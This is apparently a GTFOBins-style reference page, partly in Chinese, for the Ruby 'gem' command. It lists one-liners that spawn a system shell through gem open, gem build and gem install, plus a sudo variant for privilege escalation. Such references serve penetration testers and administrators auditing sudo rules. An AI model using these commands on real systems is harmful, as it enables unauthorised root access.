.. / gem

shell

用来生成一个交互式的系统shell。

This requires the name of an installed gem to be provided (rdoc is usually installed).
```
gem open -e "/bin/sh -c /bin/sh" rdoc
```
This invokes the default editor, which is likely to be [vi](/gtfobins/vi/), other functions may apply. This requires the name of an installed gem to be provided (rdoc is usually installed).
```
gem open rdoc
:!/bin/sh
```
This executes the specified file as [ruby](/gtfobins/ruby/) code.
```
TF=$(mktemp -d)
echo 'system("/bin/sh")' > $TF/x
gem build $TF/x
```
This executes the specified file as [ruby](/gtfobins/ruby/) code.
```
TF=$(mktemp -d)
echo 'system("/bin/sh")' > $TF/x
gem install --file $TF/x
```

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

This requires the name of an installed gem to be provided (rdoc is usually installed).
```
sudo gem open -e "/bin/sh -c /bin/sh" rdoc
```